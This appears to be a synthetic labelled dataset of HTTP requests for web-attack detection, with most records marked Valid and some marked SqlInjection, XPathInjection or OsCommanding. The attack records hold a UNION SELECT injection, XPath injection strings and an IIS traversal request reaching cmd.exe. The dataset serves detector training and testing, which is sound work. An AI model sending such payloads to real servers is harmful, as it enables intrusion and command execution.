Cookie: nh6ad2tg0zonh=imoetteqarp;t6xtermFXZK5BYM=9s3ddocument /lmu
Cookie2: $Version="867"
Date: Sun, 01 May 05 14:26:30 CET
ETag: W/"B@X6mQUMS2BRlAFjR"
Expect: 9Toz
From: tlvajp@oiboillauo.de
If-Modified-Since: Wed, 17 Mar 04 21:22:16 UTC
If-Unmodified-Since: Wed, 24 Mar 10 14:34:59 UTC
If-Match: "iFyNHEynGFZOOAD"
If-None-Match: "hRDPa0@TcqMHfO4r"
If-Range: *
Max-Forwards: 8653
MIME-Version: 6.3
Pragma: ed=dnaei
Proxy-Authorization: NTLM b2VpZk9zcG54dGVldG91czgzaW9vaWVkRmRocjF0Ym4=
Authorization: NTLM b2h0ZWFpdEdkczRvaWkwaXpvZWVLakxaYlRhaHJnaHRuZWVp
Range: -92007,597-,975-
Referer: http://www.yteh9aii.gov/thj2hk/eogatal4/ptjU/qai9.tar
TE: trailers
Trailer: Upgrade
User-Agent: p08I5otoro/9.5
UA-CPU: PowerPC
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 396x457
Via: 2.3 244.172.94.164
Transfer-Encoding: 2assd; kagneiia=hrtH
Upgrade: een/2.2
Warning: 846 www.tstit.gif:25 "i2el2i" "Sat, 15 Apr 06 23:55:01 UTC"
X-Forwarded-For: 129.8.72.4
X-Serial-Number: 1442191022000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2009
Start - Id: 20322
class: Valid
GET /em_OjOoUfODk0eYf@/gwf0BbbEv/i4Y4/ghtrdeAcaptn/ef/eYOdkHHyV14FpRFF2jTN.aspx? HTTP/1.1
Host: 238.79.98.12
Connection: eseo
Accept: audio/x-wav
Accept-Charset: x-mac-korean, x-mac-roman, iso-10646-ucs-2;q=0.7, ks_c_5601-1987;q=0.7
Accept-Encoding: *
Accept-Language: hny-lruoS;q=0.2, enrr2i-enlrmi8h
Cache-Control: no-store
Client-ip: 222.88.81.122
Cookie: hmfeethnmb=g(;uthty6=59;wefH62icczoaeX=6;cs=91;n3asi=Obe)nn]mamT4 8emqxmlt
Cookie2: $Version="46"
Date: Sun, 09 Dec 07 08:56:55 GMT
ETag: "4NcBAHXrh7kq4r4e"
Expect: 100-continue
From: 9qbyo33@htvnn.org
If-Modified-Since: Mon, 16 Jan 06 23:07:53 UTC
If-Unmodified-Since: Sun, 29 Aug 04 02:39:14 CET
If-Match: *
If-None-Match: "6oB.5SJ.oR7g2tPXnBLA"
If-Range: Tue, 23 Dec 08 06:52:09 GMT
Max-Forwards: 8588
MIME-Version: 6.6
Pragma: Deuf='wseM'
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM Y29lb3RhdGhrbDVUUnJCYW9pZXdlYXQ5aWlieHRCdWhlc3RxZWN0YnAyaDNtYw==
Range: -2,0-2423
Referer: http://www.tihn8uam.biz/92ueaC/netpe/ssUpaoke/tsalvpar/5er2edo5.exe
TE: deflate,gzip;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.2 (compatible; ach1AeaO; SunOS sun4u; ttyonsH; s3airirer)
UA-CPU: PowerPC
UA-Disp: 2892,8834,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5764x832
Via: FTP/1.6 118.210.178.145
Transfer-Encoding: gzip
Upgrade: ha6gn/0.9, tetpr/6.4, exend/4.5, i4dR/0.3
Warning: 912 241.22.51.255 "taWienmcemueh" 
X-Forwarded-For: 115.210.125.144
X-Serial-Number: 696774
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20322
Start - Id: 27529
class: Valid
GET /9n7I4JtqVRMZ@NIGgNmX/vecyqacmdnRS/uOewysinwcNqoital3/Sm/npu/kpBCtVYCHaA/OjupdateMu/rne76aeltto/rpeKerardte/tfyy/tj.css? HTTP/1.0
Host: www.om51n.net:80
Connection: imol
Accept: */*
Accept-Charset: iso-8859-4, x-mac-chinesesimp;q=0.4, utf-7, utf-8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 34.117.164.116
Cookie: ee1n0iThq=e> ;nesnie=723
Cookie2: $Version="154"
Date: Wed, 24 Mar 10 18:36:03 GMT
ETag: "C16GhkuS3HgCb48Ra"
Expect: idipe=Guooeeo4;dkhes=ottorc
From: jdne@cltrleiio.gov
If-Modified-Since: Wed, 26 May 04 02:07:40 GMT
If-Unmodified-Since: Fri, 02 Jan 09 17:10:48 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Mar 06 17:11:48 UTC
Max-Forwards: 4835
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Lusn9e tcdtEdv=crelsk8
Range: 895579-,54531-,8-
Referer: http://www.mIgi0m.st/raTN0Eta/6ahHts5l/luaea.gif
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.9 (Windows; U; WinNT 2.3; bH-5s; rv:0.9.5) Gecko/84722702
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0727x861
Via: FTP/2.4 www.nSwntr.html
Transfer-Encoding: identity
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 232 www.dr45aqxr.png "tclecucgtT" "Mon, 01 Jan 07 08:37:04 GMT"
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 427762626542035
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27529
Start - Id: 42433
class: SqlInjection
GET /sjo8@QLZS8A.ok/aVFVoTrEeIwypla/rbcxcsn6q/passthruCtyWperl7tjVYO.jpg?laz2sTaenn3he=mmz%7Cnbxstdintc%2B&biT=mfAr4&agErpyno=%27++++%29+++UNION++ALL++SELECT+++%27on7oeth0%27%2C9%2C996%2C%27l7j%27%2C845+++++FROM++ntt++WHERE++++%28+%27%27+%3D++%27&soola=ur&estsiiruiojti=rsait%24dexnahnlwhere9 HTTP/1.0
Host: 249.84.152.199
Connection: close
Accept: */*
Accept-Charset: windows-1251, euc-kr, iso-8859-5, x-mac-chinesesimp, windows-1250;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 34.227.190.70
Cookie: Id4tmochaPi4=h4eval;zgThhxdhoi=s9;ZMN1-YY5inputtmpK=met'eiiybgsound|3fromxterma|xha;rl8ORt=67;iakth8e=40978408;el6rtenHifD=3
Cookie2: $Version="2"
Date: Thu, 14 Oct 04 22:33:27 GMT
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Fri, 07 Apr 06 17:21:38 GMT
If-Unmodified-Since: Sat, 08 Aug 09 11:28:27 CET
If-Match: "GkOAUG4fFCndLOMzL"
If-None-Match: "6njufBTjkQkYSqVj"
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 57
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: srtA rmttlde=enielqo
Range: 53-,-2932
Referer: http://7iainss.cz/igffe3e.jsp
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/3.3 (X11; U; Linux i386 4.5; nE-ed; rv:5.3.8) Gecko/15867914
UA-CPU: 68000
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: HTTP/2.7 www.alttnne.jpeg:9, 5.8 www.gfDdhe.shtml
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42433
Start - Id: 3845
class: Valid
GET /4QOBCw7bWgr/h7giU6CGZVOsA2NYTY/eDM0Njj-Afjj5/b3XUugQqVom-x@6uGFv/etdif7cQCteen/KRp/oaas6gksnitrneo.css?tartiirnems=yU9WXPLAU6Ix&ase=1estythinaAiaR6a&rgwen6=bzD9b1V&pspositionbB=l3&lt=rtmpdasntplh&r0lp3=%3Cr2lib+tht%28 HTTP/1.0
Host: 74.82.97.77
Connection: close
Accept: */*;q=0.7
Accept-Charset: isiri-3342;q=0.9, iso-8859-6
Accept-Encoding: 
Accept-Language: cehs-dths;q=0.1, Lre1xhsB-tofeoleh;q=0.7, aydD-tretiw, dss-nur
Cache-Control: max-age=4670
Client-ip: 192.184.71.53
Cookie: aoiWUz=i<;me=>eyrm;mererlenDneesa=priemTezied
Cookie2: $Version="105"
Date: Sat, 24 Sep 05 12:38:01 CET
ETag: W/"PKrfLJ6Gsklhj61ds"
Expect: nbebn1wt=a6eje
From: N8otdyin@xnevet.de
If-Modified-Since: Thu, 11 Oct 07 19:52:21 GMT
If-Unmodified-Since: Thu, 04 Sep 08 08:56:54 GMT
If-Match: *
If-None-Match: "SBxc9LnmAID5wyzABb"
If-Range: Sun, 08 Feb 04 09:17:51 UTC
Max-Forwards: 8
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: zoctyi 7aisneR=e096hns
Authorization: NTLM dGVlSmlpckR3NG9zbnNUaWFlYWFpOXdudG5vN25tbHJtaGxPSTlpRmU=
Range: -486,5599-,8-3090
Referer: /aomjc7rr/eat1hPrg.tar
TE: chunked,trailers,trailers
User-Agent: t.mFKjMA http://www.kit4dd.it
UA-CPU: 68000
UA-Disp: 9985,6519,16
UA-Color: color32
Via: 0.8 www.eT9a.gif:785
Transfer-Encoding: gzip
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5
Warning: 584 www.iahsed.jpg "oi5d" "Wed, 25 Jul 07 08:26:14 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3845
Start - Id: 24728
class: Valid
GET /dfnI8N/nusvEae39yDsabihco/t9f46/eLyN/9Scopynodeg./otccg2Atids/mrzihcDeonianma/o5FDph.uJ.sh?wr=15236&ah=8361&waesht0ct5cfeNn=iw30aI_Y&8eeyaaana=%7Cajei&esOERroyaire=noe&aL=750506&xtgd40Kmailg=26225651&6iapnftrndsa10d=gttxze7wri HTTP/1.1
Host: 112.94.67.134
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: h-al65L;q=0.4
Cache-Control: only-if-cached
Client-ip: 242.88.120.95
Cookie: WprNsmoLpicomb=ulvvhArVrAyU;lr1zalhat=206576;4nl2eilCu2j=8
Cookie2: $Version="732"
Date: Sun, 17 Jan 10 17:42:20 CET
ETag: W/"rT_2qatuZEWsIh0Ss"
Expect: Lfhs7
From: 4Pioe@levcc.org
If-Modified-Since: Thu, 25 Mar 10 21:07:56 UTC
If-Unmodified-Since: Thu, 29 Oct 09 17:56:05 UTC
If-Match: "pkxp_4ReWsRw4pPZKCh"
If-None-Match: *
If-Range: Fri, 12 Oct 07 22:27:57 UTC
Max-Forwards: 76
MIME-Version: 8.3
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM czBnZWVlaDlpYWlzOG9haG40ZGNzZ3RiZWVhQzRtcmFoMmxoYWVuamFjaG5h
Range: 991-
Referer: /el6vis/99yH/arHpse4/uupot.fgf
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: dgNYBN.h http://www.Focn.gov
UA-CPU: MIPS
UA-Disp: 423,3008,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 7.8 www.ys0o.css, FTP/1.4 www.amovc.js
Transfer-Encoding: deflate
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24728
Start - Id: 49304
class: XPathInjection
GET /cdocumentcmdN/estnuld/1QDQFFDgrZAn/dHSnFLZEJB-glUHo4Q/oA3SUOctAaLVNC_/mrpe2tydReuio/bidmhocouaitir/stdin.nqXpasswdfm.pl?hqas=ecndygaoid&aadhsl=i9n3iu%27+++++or++%28i++++%3C+++++count%28oIi%2Fchild%3A%3Atext%28%29%29+++and+++++j+%3C++++count%28jum%2Fchild%3A%3Acomment%28%29%29++++and++++k+%3C+++count%28Bp%2Fchild%3A%3A*%29+++%29++++or++%279sngef%27+++%3D%27+++the38%27++or&henrief=u7stetoGeo4On&mm=Esa3oOferd HTTP/1.0
Host: 198.35.91.8
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ndeeOdie-rh;q=0.3, 0hswtus-etve, aiua-geedc6o, w-4uv, apho-3gt
Cache-Control: no-transform
Client-ip: 249.173.49.26
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="05"
Date: Wed, 09 Jul 08 13:51:38 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Dec 05 19:02:48 CET
If-Unmodified-Since: Thu, 28 Jun 07 14:23:20 GMT
If-Match: "eZVfXv@bAQ9L_nCq"
If-None-Match: *
If-Range: Wed, 09 Aug 06 24:17:31 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: ir=9
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://tsdoh9.st/bmuewE/fohiet/7idbdHen/1aosig.jpeg
TE: chunked
Trailer: Date
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 9.7; am-mo; rv:5.5.7) Gecko/73670000
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 902784
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49304
Start - Id: 49596
class: XPathInjection
GET /EwA.nsf?ai=ese0aThumtn2eeidhd&hLX4LNhLd2=tfleme%28w&dpedlrdbieqR=%28i++++%3C++++count%28tfau%2Fchild%3A%3Atext%28%29%29++++and++j+++%3C+++count%28mtZi%2Fchild%3A%3Acomment%28%29%29+++++and+++k+++++%3C++++count%28ai%2Fchild%3A%3A*%29+++++%29&mkvFHCnwget_W=32617354&aseKowyoe=6+yopen&wNdCev=ltu%27&yttse=801&ionos43gi=tfEJkFSAMA1&eec8e6notlr=9d%40XXZpot HTTP/1.1
Host: 139.154.172.189
Connection: rdbeIro
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oep-caen;q=0.3, It0Irr-I9xa, ymhcdyue-enGw;q=0.1, oRoa-a66b0;q=0.7
Cache-Control: min-fresh=8
Client-ip: 132.114.34.1
Cookie: FKmwk=n7ntar2sdoiwaE;fht1t=rcdeb8iI8hz;a8aqwrtn83dltti=annddrennkr;aioec=pcB;m36lluxgal8aeth=OoVN
Cookie2: $Version="81"
Date: Sat, 25 Sep 04 20:02:00 CET
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: wiNgsai@oernriaeee.de
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "LO9b7hYY9eNClVead"
If-None-Match: *
If-Range: "VG00Mw9pd70WJk."
Max-Forwards: 633
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: NTLM aWNvZW5zc3NvbnRpbjZlYW1tYWVhcnNlVGVkZWh1d3dhZGVoYWU=
Range: 124-314534,89-
Referer: /s3na0cns/nhMeAEh/wgt8hntg/iI6m.doc
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Range
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 0.1; Nh-ts; rv:9.8.8) Gecko/40171563
UA-CPU: StrongARM
UA-Disp: 879,0728,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 122x540
Via: pen/3.9 www.netdBan7.png, 8l2i/4.1 www.igeeddb.tiff
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49596
Start - Id: 28478
class: Valid
GET /hL1L349h/frsimrhvr0lenahpblke/qMwrbx/Nttnfdeinsbun/4wleosir1h5k/gxUceAdKZKqoK@0.O/lTXlIxt3nExZlnU4m.cfm?0HNO3PN9d=access_logtdocument&uehksi14fh31y=32174940&siennuEt=iPkcAmuFWl%40&oesimldhsIOe=tstyleknn%5DcqankMea&5cCtNeao=%28o-&33esek1tBlip=+perlprocessing-instruction0ja&2p8rr30TtUbti=aDq8uFfe8usrlomailpsp&Rb.T=45252 HTTP/1.1
Host: www.euvh.cz
Connection: detiuhst
Accept: */*;q=0.9
Accept-Charset: hz-gb-2312;q=0.3, iso-2022-jp;q=0.6, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5774
Client-ip: 122.199.110.148
Cookie: 1zascYlbAcmd=eeulsM2
Cookie2: $Version="5"
Date: Mon, 10 May 04 19:14:00 GMT
ETag: W/"4oMQV_ux-KoTLYo16"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Wed, 24 Sep 08 01:29:01 CET
If-Unmodified-Since: Sat, 13 Mar 10 16:00:57 GMT
If-Match: "8VwELr@EHmEvrCGRgE"
If-None-Match: "R8dtEqeVgsDFay0rZi"
If-Range: Mon, 29 Aug 05 07:27:55 GMT
Max-Forwards: 5
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: Digest opaque="ao6rP6og"
Range: 51205-,399-
Referer: /cvmoemi/hhat7ih/oIiso/85xwmr/eoupe.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 2RemUdltEw/3.3.9.8.8
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: FTP/0.8 225.37.198.120
Transfer-Encoding: identity
Upgrade: 9eO/8.1, Ici3uh/9.0, hycSrn/5.3
Warning: 489 121.229.92.62 "gfasavwbhatyeEell" "Tue, 13 Apr 04 09:59:47 UTC"
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28478
Start - Id: 9012
class: Valid
GET /aRposition/V82xc/aY9DpLKqV_Iq8.g/sOyKGUK/cl1-suKITCgq.css? HTTP/1.1
Host: www.uJHov.de
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.4, windows-1253, ks_c_5601-1987, shift_jis, windows-1252;q=0.7
Accept-Encoding: 
Accept-Language: aei2ss-intInr;q=0.2, kiiirs-t7nandee, h-eHjos;q=0.3, em36c-e, eoh-EstHwlla;q=0.8
Cache-Control: max-stale
Client-ip: 67.214.226.156
Cookie: arf8qaa=mfed;uiieynn=ceNI4on3execDyopen;tuis=2753171413;oiemsl=9Z7a
Cookie2: $Version="34"
Date: Wed, 08 Oct 08 21:14:21 CET
ETag: W/"Zd4TEEiadfEZVn1TSmFm"
Expect: rsna=taeheo4;iaiNrrni
From: 0c6Bwgm@lcfes.st
If-Modified-Since: Mon, 21 Sep 09 01:14:53 CET
If-Unmodified-Since: Sun, 22 Nov 09 12:50:47 UTC
If-Match: "AZjt1iYqN.ZgPAJNwHg"
If-None-Match: *
If-Range: Mon, 21 Aug 06 06:38:36 GMT
Max-Forwards: 296
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic dWV5dGRzOmR2dWFo
Authorization: bM7ar setw=tloe2s
Range: -751,66639-06
Referer: /aDiTi/oDmrmpz/sqseiom/po5to/ian4rlo.msf
TE: chunked;q=0.8,gzip
Trailer: From
User-Agent: Mozilla/7.4 (X11; U; Solaris 4.9; ne-tH; rv:8.6.5) Gecko/78493164
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7350x9086
Via: 1.3 www.aigdo.jpeg:331, 0.6 212.218.38.191:16215
Transfer-Encoding: thsgs
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9012
Start - Id: 36533
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 229.113.217.124
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: euc-jp;q=0.4
Accept-Encoding: *
Accept-Language: ijoqi1-deb;q=0.3, leFg-IfPEsua
Cache-Control: max-stale=433
Client-ip: 213.233.54.110
Cookie: 9YbpJCEEo9J=bCi8e;@lUw7KF=5gnss
Cookie2: $Version="647"
Date: Fri, 22 Feb 08 23:07:51 GMT
ETag: W/"NVc7rgRLv9r5cKh@1zV"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Wed, 06 Oct 04 12:23:13 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "V_mO-w7S.u21jSYpSY"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 9
MIME-Version: 0.6
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 01232-,419-,638-
Referer: http://orte.st/nqdj1t.mp3
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/0.1 (compatible; Nict7; Open BSD i586; 7zlt0ugjb)
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: compress
Upgrade: ernz/8.4, hotewo/3.0, etdeas/6.6, nbu/1.6, owgLo/3.9
Warning: 375 www.gfsleIzg.jpg:66 "hjNhnn62m" 
X-Forwarded-For: 58.254.229.197
X-Serial-Number: 55534835625911216707
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36533
Start - Id: 49299
class: XPathInjection
GET /recnetbghahtsa/rm@aEhRncy./gEk.s@YWF@.E7a8az9/wdYmnvIDnetcateVSC/wurzuynra/QaSd/8k01d70bfTE@_5e/asn/36qicok/izxZd4zLA7/onaRa1o8z.htm?hbd=e9i%27++or+%28i+%3C+++++count%282ri6%2Fchild%3A%3Atext%28%29%29++and++++j++%3C++++count%281wRdlz%2Fchild%3A%3Acomment%28%29%29+++++and++++k++++%3C+++count%28l5vca%2Fchild%3A%3A*%29+++++%29+++++or+++%27eRnpir83%27++%3D++%27++++he7e%27+++or&Lkxfjcatm=819560&etirasbgrbstueM=%5Dhbetween&Lqse=%3Df%3Ctelnett&ghcaae3iiloee=eus&tke1wmnqsbeee=oHJ8Us&ab6aph8Ruihl=ia&HoKoituoa=bsi%25+asl%27b%7Co&lnjed=dohom&vQ40uD=9558722 HTTP/1.1
Host: www.tfo6oen.gov:95
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="118"
Date: Thu, 24 Aug 06 21:53:38 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 26 May 05 06:10:19 CET
If-Match: "P1aBp.6U._P3HMFw5s5j"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 718-316
Referer: http://otl1lb.cz/adwhu7.bin
TE: chunked
Trailer: Trailer
User-Agent: aWcPyB http://www.ear6o7.gov
UA-CPU: MIPS
UA-Disp: 284,977,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: rsiydb
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49299
Start - Id: 3888
class: Valid
PUT /nsW/moinlia/6s4/lKos/o-gUPbjmNQWi/ettfyehercs2s6s/BSJ4g/TSkXvzevbscripthuyCY/lnten/ekUF59Pmpasswd/e0Trydqd.jpg? HTTP/1.0
Content-Length: 197
Content-Language: exex
Content-Encoding: gzip
Content-Location: /SnFnFkv/ooii/nnfwtBm/lgoir/saIr.css
Content-MD5: cTdlc2xzZHR4YWRlaGlFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 20:50:31 GMT
Last-Modified: Wed, 29 Dec 04 13:40:49 UTC
Host: 53.63.5.168
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-ce;q=0.2, euc-tw, iso-2022-kr;q=0.7, iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 106.80.24.214
Cookie: Z8mthncTVSZ=wRathsLDagaeelzhQ;TQmbot=2566641776;rmeuir=787
Cookie2: $Version="32"
Date: Tue, 28 Nov 06 03:18:43 GMT
ETag: "YHx9wKYTrm8.fKBjo"
Expect: irpempa
From: sEaatM@keea.biz
If-Modified-Since: Thu, 08 Mar 07 16:41:41 UTC
If-Unmodified-Since: Wed, 26 Mar 08 04:35:11 UTC
If-Match: *
If-None-Match: *
If-Range: "DIY@N60LRgK3rv8"
Max-Forwards: 62
MIME-Version: 1.5
Pragma: 8wwi='a'
Proxy-Authorization: NTLM b2xpaG9ycjBwbnl5ZW9mdHJoamt0b2FicGhheHFsZHkz
Authorization: Basic d2lpMDpubE5pb3M0
Range: 834-,-492,8796-9
Referer: /gTrseo/tegfoheC/v47iPr/eris/tsend.html
TE: gzip,trailers
Trailer: Accept
User-Agent: nCEEeN http://www.Nm97o.net
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5649x2813
Via: FTP/1.2 90.102.85.106, HTTP/5.5 www.mtled9d.shtml, Oaaseo/1.7 www.pntvino.png:64651
Transfer-Encoding: deflate
Upgrade: rAn/3.9
Warning: 279 www.eTTt9.html:61892 "e6edtaEHsOeiysxShtT" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0hNuRLsock_streamQOGoinsert=655443&odsrae4=722184&stemIsnrAbeWo=e9ti<[\g&ii=etseaiea&@2mWcyechoFU1=t0iteesco&ayZeoiytium=p8B&OI_IS_3_Nn7=txterma=&7y8esa=flQF7ou&4tNH0ncw4-=jvxf&teeifhGs=ont

End - Id: 3888
Start - Id: 20540
class: Valid
GET /eGVXB_ZP7hYswF/Mprocessing-instructioneU4tKekvarKuO/s_IFgCgHF05-ZMEYjp/iehiueio/miespthtlga/nBupdateRNGZ4VZj_B2e/le4M3Wu@plwXqSLU/PUoPdpositionEadminG3aR/cq27Vww4c/eGAu1b5kDW_/0ZhwY3Y9yyK-aJY@-/zyrNqs3dawi.jpg?fe=sssm7cmdpassthrueca1&56gq4=1364964&txJm4=Tes&XuarmaL=2pX84E.n&iTQ9_RdoN8dnph-=ebetweenrni&eam3mty=880427&aalxao1Io=id73GBstamD&3td0dVcGvI=78610&pat=node%7E&eQvarZCgWallYx=e6et%7E&W1rinrir9Eanett=eMe_e9J&etONPBZ=otdEtfcv9i4nB HTTP/1.0
Host: www.Msu1ta9.org
Connection: close
Accept: application/*;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.9, x-mac-arabic
